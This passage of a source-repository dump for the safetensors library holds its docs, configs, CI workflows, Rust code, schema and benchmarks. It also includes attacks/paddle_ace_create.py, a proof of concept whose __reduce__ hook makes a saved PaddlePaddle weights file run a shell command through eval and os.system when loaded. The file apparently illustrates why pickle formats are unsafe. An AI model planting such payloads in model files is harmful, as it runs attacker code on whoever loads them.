23 |
24 | # Now loading
25 | loaded = load_file("./model.safetensors")
26 | ```
27 |
28 | ### Torch
29 |
30 | ```python
31 | from safetensors.torch import save_file, load_file
32 | import torch
33 |
34 | tensors = {
35 | "a": torch.zeros((2, 2)),
36 | "b": torch.zeros((2, 3), dtype=torch.uint8)
37 | }
38 |
39 | save_file(tensors, "./model.safetensors")
40 |
41 |
42 | # Now loading
43 | loaded = load_file("./model.safetensors")
44 | ```
45 |
46 | ### Developing
47 |
48 | ```
49 | # inside ./safetensors/bindings/python
50 | pip install .[dev]
51 | ```
52 | This should be enough to install the library locally.
53 |
54 | ### Testing
55 |
56 | ```
57 | # inside ./safetensors/bindings/python
58 | pip install .[dev]
59 | pytest -sv tests/
60 | ```
61 |
--------------------------------------------------------------------------------
/bindings/python/setup.cfg:
--------------------------------------------------------------------------------
1 | [isort]
2 | default_section = FIRSTPARTY
3 | ensure_newline_before_comments = True
4 | force_grid_wrap = 0
5 | include_trailing_comma = True
6 | known_first_party = safetensors
7 | known_third_party =
8 | absl
9 | conllu
10 | datasets
11 | elasticsearch
12 | fairseq
13 | faiss-cpu
14 | fastprogress
15 | fire
16 | fugashi
17 | git
18 | h5py
19 | matplotlib
20 | nltk
21 | numpy
22 | packaging
23 | pandas
24 | PIL
25 | psutil
26 | pytest
27 | pytorch_lightning
28 | rouge_score
29 | sacrebleu
30 | seqeval
31 | sklearn
32 | streamlit
33 | tensorboardX
34 | tensorflow
35 | tensorflow_datasets
36 | timeout_decorator
37 | torch
38 | torchaudio
39 | torchtext
40 | torchvision
41 | torch_xla
42 | tqdm
43 | paddlepaddle
44 |
45 | line_length = 119
46 | lines_after_imports = 2
47 | multi_line_output = 3
48 | use_parentheses = True
49 |
50 | [flake8]
51 | ignore = E203, E501, E741, W503, W605
52 | max-line-length = 119
53 |
54 | [tool:pytest]
55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS
--------------------------------------------------------------------------------
/docs/source/convert-weights.md:
--------------------------------------------------------------------------------
1 | # Convert weights to safetensors
2 |
3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensors` format, we recommend converting your weights to `.safetensors`.
4 |
5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), provided your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository.
6 |
7 | <Tip>
8 |
9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights.
10 |
11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space.
12 |
13 | </Tip>
14 |
--------------------------------------------------------------------------------
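For weights that are not on the Hub, the same conversion can be done locally; a minimal sketch, assuming the `.bin` checkpoint is a plain state dict with no shared tensors (file names are illustrative):

```python
import torch
from safetensors.torch import save_file

# Only load checkpoints you trust: torch.load unpickles arbitrary objects.
state_dict = torch.load("pytorch_model.bin", map_location="cpu")
# save_file expects contiguous tensors.
state_dict = {k: v.contiguous() for k, v in state_dict.items()}
save_file(state_dict, "model.safetensors")
```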
/.github/ISSUE_TEMPLATE/feature-request.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F680 Feature request"
2 | description: Submit a proposal/request for a new safetensors feature
3 | labels: [ "feature" ]
4 | body:
5 | - type: textarea
6 | id: feature-request
7 | validations:
8 | required: true
9 | attributes:
10 | label: Feature request
11 | description: |
12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist.
13 |
14 | - type: textarea
15 | id: motivation
16 | validations:
17 | required: true
18 | attributes:
19 | label: Motivation
20 | description: |
21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too.
22 |
23 |
24 | - type: textarea
25 | id: contribution
26 | validations:
27 | required: true
28 | attributes:
29 | label: Your contribution
30 | description: |
31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the [CONTRIBUTING.md](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) guide.
32 |
--------------------------------------------------------------------------------
/bindings/python/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples
2 |
3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!)
4 | export PYTHONPATH = src
5 |
6 | check_dirs := tests py_src
7 |
8 | modified_only_fixup:
9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs)))
10 | @if test -n "$(modified_py_files)"; then \
11 | echo "Checking/fixing $(modified_py_files)"; \
12 | black --preview $(modified_py_files); \
13 | isort $(modified_py_files); \
14 | flake8 $(modified_py_files); \
15 | else \
16 | echo "No library .py files were modified"; \
17 | fi
18 |
19 |
20 | quality:
21 | black --check --preview $(check_dirs)
22 | isort --check-only $(check_dirs)
23 | flake8 $(check_dirs)
24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source
25 |
26 | style:
27 | black --preview $(check_dirs)
28 | isort $(check_dirs)
29 |
30 | # Super fast fix and check target that only works on relevant modified files since the branch was made
31 |
32 | fixup: modified_only_fixup
33 |
34 | test:
35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/
36 |
--------------------------------------------------------------------------------
/safetensors/src/lib.rs:
--------------------------------------------------------------------------------
1 | #![deny(missing_docs)]
2 | #![doc = include_str!("../README.md")]
3 | #![cfg_attr(not(feature = "std"), no_std)]
4 | pub mod slice;
5 | pub mod tensor;
6 | /// `serialize_to_file` is only available with the `std` feature
7 | #[cfg(feature = "std")]
8 | pub use tensor::serialize_to_file;
9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View};
10 |
11 | #[cfg(not(feature = "std"))]
12 | #[macro_use]
13 | extern crate alloc;
14 |
15 | /// A facade around all the types we need from the `std`, `core`, and `alloc`
16 | /// crates. This avoids elaborate import wrangling having to happen in every
17 | /// module.
18 | mod lib {
19 | #[cfg(not(feature = "std"))]
20 | mod no_stds {
21 | pub use alloc::borrow::Cow;
22 | pub use alloc::string::{String, ToString};
23 | pub use alloc::vec::Vec;
24 | pub use hashbrown::HashMap;
25 | }
26 | #[cfg(feature = "std")]
27 | mod stds {
28 | pub use std::borrow::Cow;
29 | pub use std::collections::HashMap;
30 | pub use std::string::{String, ToString};
31 | pub use std::vec::Vec;
32 | }
33 | /// choose std or no_std to export by feature flag
34 | #[cfg(not(feature = "std"))]
35 | pub use no_stds::*;
36 | #[cfg(feature = "std")]
37 | pub use stds::*;
38 | }
39 |
--------------------------------------------------------------------------------
/Dockerfile.s390x.test:
--------------------------------------------------------------------------------
1 | FROM s390x/python
2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \
3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \
4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh
5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y
6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y
7 | WORKDIR /safetensors/
8 | RUN /root/miniconda3/bin/pip install -U pip pytest
9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub
10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")'
11 | COPY . .
12 | SHELL ["/bin/bash", "-c"]
13 | WORKDIR /safetensors/bindings/python/
14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e .
15 | # Work around error probably caused by https://sourceware.org/bugzilla/show_bug.cgi?id=32653
16 | # E ImportError: libopenblas.so.0: cannot enable executable stack as shared object requires: Invalid argument
17 | ENV GLIBC_TUNABLES=glibc.rtld.execstack=2
18 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py
19 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10'
20 | ENTRYPOINT /bin/bash
21 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/Narsil/pre-commit-rust
3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
4 | hooks:
5 | - id: fmt
6 | name: "Rust (fmt)"
7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"]
8 | - id: clippy
9 | name: "Rust (clippy)"
10 | args:
11 | [
12 | "--manifest-path",
13 | "safetensors/Cargo.toml",
14 | "--all-targets",
15 | "--",
16 | "-Dwarnings",
17 | ]
18 | - repo: https://github.com/Narsil/pre-commit-rust
19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
20 | hooks:
21 | - id: fmt
22 | name: "Python (fmt)"
23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"]
24 | - id: clippy
25 | name: "Python (clippy)"
26 | args:
27 | [
28 | "--manifest-path",
29 | "bindings/python/Cargo.toml",
30 | "--all-targets",
31 | "--",
32 | "-Dwarnings",
33 | ]
34 | - repo: https://github.com/astral-sh/ruff-pre-commit
35 | # Ruff version.
36 | rev: v0.12.8
37 | hooks:
38 | # Run the linter.
39 | - id: ruff-check
40 | # Run the formatter.
41 | - id: ruff-format
42 |
--------------------------------------------------------------------------------
/safetensors/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors"
3 | version = "0.7.0-dev.0"
4 | edition = "2021"
5 | rust-version = "1.80"
6 | homepage = "https://github.com/huggingface/safetensors"
7 | repository = "https://github.com/huggingface/safetensors"
8 | documentation = "https://docs.rs/safetensors/"
9 | license = "Apache-2.0"
10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"]
11 | readme = "./README.md"
12 | description = """
13 | Provides functions to read and write safetensors which aim to be safer than
14 | their PyTorch counterpart.
15 | The format is 8 bytes which is an unsigned int, being the size of a JSON header.
16 | The JSON header refers to the `dtype`, the `shape` and the `data_offsets` which are the offsets
17 | for the values in the rest of the file.
18 | """
19 | exclude = ["rust-toolchain", "target/*", "Cargo.lock"]
20 |
21 |
22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
23 |
24 | [dependencies]
25 | serde = { version = "1.0", default-features = false, features = [
26 | "derive",
27 | "alloc",
28 | ] }
29 | serde_json = { version = "1.0", default-features = false, features = ["alloc"] }
30 | hashbrown = { version = "0.16", features = ["serde"] }
31 |
32 | [target.'cfg(target_os = "macos")'.dependencies]
33 | libc = "0.2"
34 |
35 | [dev-dependencies]
36 | criterion = "0.6"
37 | memmap2 = "0.9"
38 | proptest = "1.7"
39 |
40 | [features]
41 | default = ["std"]
42 | std = ["serde/default", "serde_json/default"]
43 | # Kept for backward compatibility - no-op since alloc is always available
44 | alloc = []
45 |
46 | [[bench]]
47 | name = "benchmark"
48 | harness = false
49 |
--------------------------------------------------------------------------------
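The layout named in the `description` field above is simple enough to read by hand; a minimal Python sketch (illustrative only, not an API of this crate or of the Python bindings):

```python
import json
import struct

def read_safetensors_header(path: str) -> dict:
    # Illustrative reader, not part of the safetensors API.
    # Layout: an 8-byte little-endian unsigned int N, then N bytes of JSON,
    # then raw tensor data addressed by each tensor's `data_offsets`.
    with open(path, "rb") as f:
        (header_len,) = struct.unpack("<Q", f.read(8))
        return json.loads(f.read(header_len))
```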
/bindings/python/convert_all.py:
--------------------------------------------------------------------------------
1 | """Simple utility tool to convert automatically most downloaded models"""
2 |
3 | from convert import AlreadyExists, convert
4 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
5 | from transformers import AutoConfig
6 |
7 |
8 | if __name__ == "__main__":
9 | api = HfApi()
10 | args = ModelSearchArguments()
11 |
12 | total = 50
13 | models = list(
14 | api.list_models(
15 | filter=ModelFilter(library=args.library.Transformers),
16 | sort="downloads",
17 | direction=-1,
18 | )
19 | )[:total]
20 |
21 | correct = 0
22 | errors = set()
23 | for model in models:
24 | model = api.model_info(model.id, files_metadata=True)
25 | size = None
26 | for sibling in model.siblings:
27 | if sibling.rfilename == "pytorch_model.bin":
28 | size = sibling.size
29 | if size is None or size > 2_000_000_000:
30 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})")
31 | continue
32 |
33 | model_id = model.modelId
34 | print(f"[{model.downloads}] {model.modelId}")
35 | try:
36 | convert(api, model_id)
37 | correct += 1
38 | except AlreadyExists as e:
39 | correct += 1
40 | print(e)
41 | except Exception as e:
42 | config = AutoConfig.from_pretrained(model_id)
43 | errors.add(config.__class__.__name__)
44 | print(e)
45 |
46 | print(f"Errors: {errors}")
47 | print(f"File size is difference {len(errors)}")
48 | print(f"Correct rate {correct}/{total} ({correct / total * 100:.2f}%)")
49 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_create.py:
--------------------------------------------------------------------------------
1 | import paddle
2 | import numpy as np
3 | from collections import OrderedDict
4 |
5 | def _parse_every_object(obj, condition_func, convert_func):
6 | if condition_func(obj):
7 | return convert_func(obj)
8 | elif isinstance(obj, (dict, OrderedDict, list)):
9 | if isinstance(obj, list):
10 | keys = range(len(obj))
11 | else:
12 | keys = list(obj.keys())
13 | for key in keys:
14 | if condition_func(obj[key]):
15 | obj[key] = convert_func(obj[key])
16 | else:
17 | obj[key] = _parse_every_object(
18 | obj[key], condition_func, convert_func
19 | )
20 | return obj
21 | elif isinstance(obj, tuple):
22 | return tuple(
23 | _parse_every_object(list(obj), condition_func, convert_func)
24 | )
25 | elif isinstance(obj, set):
26 | return set(_parse_every_object(list(obj), condition_func, convert_func))
27 | else:
28 | return obj
29 |
30 | # hack _parse_every_object method
31 | paddle.framework.io._parse_every_object = _parse_every_object
32 |
33 | class BadDict(dict):
34 | def __init__(self, src: str, **kwargs):
35 | super().__init__(**kwargs)
36 | self.src = src
37 |
38 | def __reduce__(self):
39 | return (
40 | eval,
41 | (f"os.system('{self.src}') or dict()",),
42 | None,
43 | None,
44 | iter(self.items()),
45 | )
46 |
47 | paddle.save(
48 | [BadDict(
49 | 'echo "pwned your computer, I can do anything I want."',
50 | **{"weight": paddle.zeros((2, 2))},
51 | )],
52 | "paddle_ace.pdparams",
53 | )
54 |
--------------------------------------------------------------------------------
/docs/safetensors.schema.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://json-schema.org/draft/2020-12/schema",
3 | "title": "safetensors format header",
4 | "description": "Describes the structure of all the tensors and their metadata",
5 | "$defs": {
6 | "size_t": {
7 | "type": "integer",
8 | "minimum": 0,
9 | "maximum": 281474976710655,
10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)"
11 | },
12 | "Tensor": {
13 | "title": "Tensor",
14 | "description": "Describes the structure of one tensor",
15 | "type": "object",
16 | "additionalProperties": false,
17 | "properties": {
18 | "dtype": {
19 | "type": "string",
20 | "pattern": "([UIF])(8|16|32|64|128|256)",
21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits."
22 | },
23 | "shape": {
24 | "type": "array",
25 | "items": {
26 | "$ref": "#/$defs/size_t",
27 | "description": "Size of each dimension."
28 | }
29 | },
30 | "data_offsets": {
31 | "type": "array",
32 | "prefixItems": [
33 | {
34 | "$ref": "#/$defs/size_t",
35 | "description": "Start offset of the array. "
36 | },
37 | {
38 | "$ref": "#/$defs/size_t",
39 | "description": "End offset of the array. Equal to the previous item + array size."
40 | }
41 | ]
42 | }
43 | },
44 | "required": [
45 | "data_offsets",
46 | "dtype",
47 | "shape"
48 | ]
49 | },
50 | "Metadata": {
51 | "type": "object",
52 | "additionalProperties": {"type": "string"},
53 | "title": "Metadata"
54 | }
55 | },
56 | "type": "object",
57 | "properties": {
58 | "__metadata__": {
59 | "description": "Arbitrary metadata",
60 | "$ref": "#/$defs/Metadata"
61 | }
62 | },
63 | "additionalProperties": {
64 | "$ref": "#/$defs/Tensor"
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
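A parsed header can be checked against this schema with the `jsonschema` package (version 4+ supports draft 2020-12); a small sketch using a made-up header:

```python
import json
from jsonschema import validate

with open("docs/safetensors.schema.json") as f:
    schema = json.load(f)

# Made-up header: one 2x2 F32 tensor occupying bytes [0, 16) of the data.
header = {
    "__metadata__": {"format": "pt"},
    "weight": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]},
}

validate(instance=header, schema=schema)  # raises ValidationError on mismatch
```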
/.github/workflows/rust.yml:
--------------------------------------------------------------------------------
1 | name: Rust
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build:
8 | runs-on: ${{ matrix.os }}
9 | strategy:
10 | matrix:
11 | os: [ubuntu-latest, windows-latest, macOS-latest]
12 | toolchain: [stable]
13 | include:
14 | - os: ubuntu-latest
15 | toolchain: "1.74"
16 | defaults:
17 | run:
18 | working-directory: ./safetensors
19 |
20 | steps:
21 | - uses: actions/checkout@v6
22 |
23 | - name: Install Rust Stable
24 | uses: dtolnay/rust-toolchain@stable
25 | with:
26 | components: rustfmt, clippy, llvm-tools-preview
27 | override: true
28 |
29 | - uses: Swatinem/rust-cache@v2
30 |
31 | - name: Install cargo-audit
32 | run: cargo install cargo-audit
33 |
34 | - name: Install cargo-llvm-cov for Ubuntu
35 | if: matrix.os == 'ubuntu-latest'
36 | run: cargo install cargo-llvm-cov
37 |
38 | - name: Build
39 | run: cargo build --all-targets --verbose
40 |
41 | - name: Lint with Clippy
42 | run: cargo clippy --all-targets -- -D warnings
43 |
44 | - name: Run Tests
45 | run: cargo test --verbose
46 |
47 | - name: Run No-STD Tests
48 | run: cargo test --no-default-features --verbose
49 |
50 | - name: Run Audit
51 | # RUSTSEC-2021-0145 comes from criterion, so it only affects benchmarks
52 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145
53 |
54 | - name: Coverage report
55 | if: matrix.os == 'ubuntu-latest'
56 | run: cargo llvm-cov --release --lcov --output-path lcov.info
57 |
58 | # - name: Upload to codecov.io
59 | # if: matrix.os == 'ubuntu-latest'
60 | # uses: codecov/codecov-action@v3
61 | # with:
62 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
63 | # working-directory: ./safetensors
64 | # fail_ci_if_error: true
65 |
--------------------------------------------------------------------------------
/safetensors/benches/benchmark.rs:
--------------------------------------------------------------------------------
1 | use criterion::{criterion_group, criterion_main, Criterion};
2 | use safetensors::tensor::*;
3 | use std::collections::HashMap;
4 | use std::hint::black_box;
5 |
6 | // Returns sample data of size 2 MB
7 | fn get_sample_data() -> (Vec<u8>, Vec<usize>, Dtype) {
8 | let shape = vec![1000, 500];
9 | let dtype = Dtype::F32;
10 | let nbits = shape.iter().product::<usize>() * dtype.bitsize();
11 | assert!(nbits % 8 == 0);
12 | let n: usize = nbits / 8; // total bytes (4 bytes per F32 element)
13 | let data = vec![0; n];
14 |
15 | (data, shape, dtype)
16 | }
17 |
18 | pub fn bench_serialize(c: &mut Criterion) {
19 | let (data, shape, dtype) = get_sample_data();
20 | let n_layers = 5;
21 |
22 | let mut metadata: HashMap<String, TensorView> = HashMap::new();
23 | // 2_MB x 5 = 10_MB
24 | for i in 0..n_layers {
25 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
26 | metadata.insert(format!("weight{i}"), tensor);
27 | }
28 |
29 | c.bench_function("Serialize 10_MB", |b| {
30 | b.iter(|| {
31 | let _serialized = serialize(black_box(&metadata), black_box(None));
32 | })
33 | });
34 | }
35 |
36 | pub fn bench_deserialize(c: &mut Criterion) {
37 | let (data, shape, dtype) = get_sample_data();
38 | let n_layers = 5;
39 |
40 | let mut metadata: HashMap<String, TensorView> = HashMap::new();
41 | // 2_MB x 5 = 10_MB
42 | for i in 0..n_layers {
43 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
44 | metadata.insert(format!("weight{i}"), tensor);
45 | }
46 |
47 | let out = serialize(&metadata, None).unwrap();
48 |
49 | c.bench_function("Deserialize 10_MB", |b| {
50 | b.iter(|| {
51 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap();
52 | })
53 | });
54 | }
55 |
56 | criterion_group!(bench_ser, bench_serialize);
57 | criterion_group!(bench_de, bench_deserialize);
58 | criterion_main!(bench_ser, bench_de);
59 |
--------------------------------------------------------------------------------
/.github/workflows/python-bench.yml:
--------------------------------------------------------------------------------
1 | name: Simple benchmarks
2 | on:
3 | push:
4 | branches:
5 | - main
6 | pull_request:
7 |
8 |
9 | permissions:
10 | # deployments permission to deploy GitHub pages website
11 | deployments: write
12 | # contents permission to update benchmark contents in gh-pages branch
13 | contents: write
14 |
15 | jobs:
16 | benchmark:
17 | name: Performance regression check
18 | runs-on: ubuntu-latest
19 | steps:
20 | - uses: actions/checkout@v6
21 | - name: Install Rust
22 | uses: dtolnay/rust-toolchain@stable
23 | with:
24 | components: rustfmt, clippy
25 |
26 | - name: Install Python
27 | uses: actions/setup-python@v6
28 | with:
29 | python-version: "3.12"
30 | architecture: "x64"
31 |
32 | - name: Install
33 | working-directory: ./bindings/python
34 | run: |
35 | pip install -U pip uv
36 | uv sync --extra dev
37 |
38 | - name: Run tests
39 | working-directory: ./bindings/python
40 | run: |
41 | cargo test
42 | uv run pytest --benchmark-json output.json benches/
43 | # Download previous benchmark result from cache (if exists)
44 | - name: Download previous benchmark data
45 | uses: actions/cache@v5
46 | with:
47 | path: ./cache
48 | key: ${{ runner.os }}-benchmark
49 | # Run `github-action-benchmark` action
50 | - name: Store benchmark result
51 | uses: benchmark-action/github-action-benchmark@v1
52 | with:
53 | # What benchmark tool the output.json came from
54 | tool: 'pytest'
55 | # Where the output from the benchmark tool is stored
56 | output-file-path: ./bindings/python/output.json
57 | github-token: ${{ secrets.GITHUB_TOKEN }}
58 | # Push and deploy GitHub pages branch automatically
59 | auto-push: ${{ github.event.pull_request.head.repo.fork == false }}
60 | comment-on-alert: true
61 | # Users to mention in the alert commit comment
62 | alert-comment-cc-users: '@danieldk,@McPatate'
63 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors.paddle import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = paddle.zeros((50257, 768))
13 | tensors["wpe"] = paddle.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,))
22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,))
23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,))
28 | tensors["ln_f.weight"] = paddle.zeros((768,))
29 | tensors["ln_f.bias"] = paddle.zeros((768,))
30 | return tensors
31 |
32 |
33 | def test_paddle_paddle_load(benchmark):
34 |     # Benchmark native paddle loading
35 | weights = create_gpt2(12)
36 | with tempfile.NamedTemporaryFile(delete=False) as f:
37 | paddle.save(weights, f.name)
38 | result = benchmark(paddle.load, f.name)
39 | os.unlink(f.name)
40 |
41 | for k, v in weights.items():
42 | tv = result[k]
43 | assert paddle.allclose(v, tv)
44 |
45 |
46 | def test_paddle_sf_load(benchmark):
47 |     # Benchmark safetensors loading into paddle
48 | weights = create_gpt2(12)
49 | with tempfile.NamedTemporaryFile(delete=False) as f:
50 | save_file(weights, f.name)
51 | result = benchmark(load_file, f.name)
52 | os.unlink(f.name)
53 |
54 | for k, v in weights.items():
55 | tv = result[k]
56 | assert np.allclose(v, tv)
57 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import jax.numpy as jnp
5 | from flax.serialization import msgpack_restore, msgpack_serialize
6 | from safetensors.flax import load_file, save_file
7 |
8 |
9 | def create_gpt2(n_layers: int):
10 | tensors = {}
11 | tensors["wte"] = jnp.zeros((50257, 768))
12 | tensors["wpe"] = jnp.zeros((1024, 768))
13 | for i in range(n_layers):
14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,))
15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,))
16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024))
17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304))
18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304))
19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768))
20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768))
21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768))
22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768))
23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072))
24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072))
25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768))
26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768))
27 | tensors["ln_f.weight"] = jnp.zeros((768))
28 | tensors["ln_f.bias"] = jnp.zeros((768))
29 | return tensors
30 |
31 |
32 | def load(filename):
33 | with open(filename, "rb") as f:
34 | data = f.read()
35 | flax_weights = msgpack_restore(data)
36 | return flax_weights
37 |
38 |
39 | def test_flax_flax_load(benchmark):
40 |     # Benchmark flax msgpack loading
41 | weights = create_gpt2(12)
42 | with tempfile.NamedTemporaryFile(delete=False) as f:
43 | serialized = msgpack_serialize(weights)
44 | f.write(serialized)
45 | result = benchmark(load, f.name)
46 | os.unlink(f.name)
47 |
48 | for k, v in weights.items():
49 | tv = result[k]
50 | assert jnp.allclose(v, tv)
51 |
52 |
53 | def test_flax_sf_load(benchmark):
54 |     # Benchmark safetensors loading into jax
55 | weights = create_gpt2(12)
56 | with tempfile.NamedTemporaryFile(delete=False) as f:
57 | save_file(weights, f.name)
58 | result = benchmark(load_file, f.name)
59 | os.unlink(f.name)
60 |
61 | for k, v in weights.items():
62 | tv = result[k]
63 | assert jnp.allclose(v, tv)
64 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | import tempfile
4 |
5 |
6 | if platform.system() == "Darwin":
7 | import mlx.core as mx
8 | from safetensors.mlx import load_file, save_file
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = mx.zeros((50257, 768))
13 | tensors["wpe"] = mx.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768))
28 | tensors["ln_f.weight"] = mx.zeros((768))
29 | tensors["ln_f.bias"] = mx.zeros((768))
30 | return tensors
31 |
32 | def load(filename):
33 | return mx.load(filename)
34 |
35 | def test_mlx_mlx_load(benchmark):
36 |         # Benchmark native mlx (npz) loading
37 | weights = create_gpt2(12)
38 | with tempfile.NamedTemporaryFile(delete=False) as f:
39 | filename = f"{f.name}.npz"
40 | mx.savez(filename, **weights)
41 | result = benchmark(load, filename)
42 | os.unlink(f.name)
43 |         os.unlink(filename)
44 | for k, v in weights.items():
45 | tv = result[k]
46 | assert mx.allclose(v, tv)
47 |
48 | def test_mlx_sf_load(benchmark):
49 |         # Benchmark safetensors loading into mlx
50 | weights = create_gpt2(12)
51 | with tempfile.NamedTemporaryFile(delete=False) as f:
52 | save_file(weights, f.name)
53 | result = benchmark(load_file, f.name)
54 | os.unlink(f.name)
55 |
56 | for k, v in weights.items():
57 | tv = result[k]
58 | assert mx.allclose(v, tv)
59 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_handle.py:
